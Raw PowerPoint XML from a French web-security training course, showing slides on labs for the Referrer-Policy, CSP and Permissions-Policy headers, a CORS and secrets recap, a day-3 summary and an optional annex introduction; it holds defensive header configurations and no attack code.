        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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3"/>
              </a:rPr>
              <a:t>Lab hébergé  ·  s3_04 / referrer-policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1773936"/>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4"/>
              </a:rPr>
              <a:t>Local  ·  http://127.0.0.1:8037/referrer-policy/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="d3s4-referrer-leak.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2449260" y="2066544"/>
            <a:ext cx="7262999" cy="3310127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>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no-referrer : plus de fuite. Posez le header. Rechargez. Le jeton ne traverse plus.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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7"/>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8"/>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8"/>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s3_04  ·  CSP</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script-src : ’self’, plus une origine. Pas *.</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01 passe (’self’). 02 est bloqué : training.dercetech.com n’est pas dans script-src. 03 doit rester bloqué.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ajoutez UNIQUEMENT https://training.dercetech.com. Pas d’étoile. Pas de ’unsafe-inline’.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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3"/>
              </a:rPr>
              <a:t>Local  ·  http://127.0.0.1:8037/content-security-policy/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1773936"/>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4"/>
              </a:rPr>
              <a:t>Widget distant  ·  trusted-widget.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="d3s4-csp-lab.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467535" y="2066544"/>
            <a:ext cx="7226448" cy="3310127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>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Content-Security-Policy: script-src ’self’ https://training.dercetech.com. L’inline, jamais.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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7"/>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8"/>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8"/>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475488"/>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LAB  ·  s3_04  ·  Permissions-Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="694944"/>
            <a:ext cx="10058400" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cette pub aimerait ouvrir votre webcam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Une iframe tierce. CameraFit. La page parent décide si elle a le droit de demander la cam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Permissions-Policy: camera=(). Pas l’origine de la pub. Pas *.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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3"/>
              </a:rPr>
              <a:t>Local  ·  http://127.0.0.1:8037/permissions-policy/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1773936"/>
            <a:ext cx="10058400" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Hébergé  ·  s3_04 / permissions-policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="d3s4-permissions-camerafit.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173412" y="2066544"/>
            <a:ext cx="3814694" cy="3310127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5431536"/>
            <a:ext cx="10058400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>_servers/…/day-3/s3_04/permissions-policy/  ·  camera=() : pas de flux. La pub reste de la pub.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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 CORS protège — et ce qu’il ne protège pas</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où ne pas mettre un secret, et ce que .env ne fait pas</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poser les headers une fois, et les cinq du lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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942185" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CORS, secrets, headers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 CORS protège — et ce qu’il ne protège pas</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Lecture JS cross-origin. Un POST part quand même. Allow-list, pas *.</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où ne pas mettre un secret, et ce que .env ne fait pas</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Pas dans git. .env n’est pas un coffre : un RCE lit encore getenv.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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poser les headers une fois, et les cinq du lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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HSTS, nosniff, Referrer-Policy, CSP, Permissions-Policy. Network le montre.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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Bilan du jour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175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SECTION  04</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Bilan du jour 3</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20 min  ·  l’annexe est optionnelle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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Bilan du jour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Ce que vous savez faire ce soir</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Sans notes, à voix haute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falsifier un JWT, puis exiger la signature (HS256, exp, sub)</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scoper une ressource : middleware Express, décorateur Flask</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poser une allow-list CORS, ranger les secrets, les headers, les logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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Jour 3</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185062" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bilan du jour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85216"/>
            <a:ext cx="10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUITE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="10058400" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L’annexe, si vous avez fini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>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5840" y="1517904"/>
            <a:ext cx="10058400" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les trois jours tiennent sans. XSS stocké, CSRF, DMZ : en annexe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas un examen. Une base. Le reste, quand vous voulez.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3099816"/>
            <a:ext cx="73152" cy="2569464"/>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1078992" y="3099816"/>
            <a:ext cx="9921240" cy="2569464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3227832"/>
            <a:ext cx="9464040" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Optionnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3557016"/>
            <a:ext cx="9464040" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pour ceux qui ont du temps. Pas un badge LinkedIn.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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4"/>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5"/>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178 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cover-hero-day3-1296x1236.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="457200"/>
            <a:ext cx="5925312" cy="5650992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="457200"/>
            <a:ext cx="5806440"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1965960"/>
            <a:ext cx="5029200" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE  ·  optionnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2377440"/>
            <a:ext cx="5029200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Si vous avez fini plus tôt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3931920"/>
            <a:ext cx="5029200" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas le programme. Pas un examen. La suite de ce que vous avez déjà sous les doigts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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179 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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585216"/>
            <a:ext cx="10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>POURQUOI CETTE ANNEXE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="10058400" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les trois jours tiennent sans ça.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>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1517904"/>
            <a:ext cx="10058400" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookies, hash, SQL, JWT, IDOR, CORS, headers : c’est le cours. Vous l’avez pratiqué.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ici : le même réflexe, un cran plus loin. Ou le nom d’une chose que vous avez déjà cassée.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3099816"/>
            <a:ext cx="73152" cy="2569464"/>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1078992" y="3099816"/>
            <a:ext cx="9921240" cy="2569464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3227832"/>
            <a:ext cx="9464040" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Règle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3557016"/>
            <a:ext cx="9464040" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas de dossier day-4 magique. Les snippets, vous les lisez. Vous les raisonnez.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
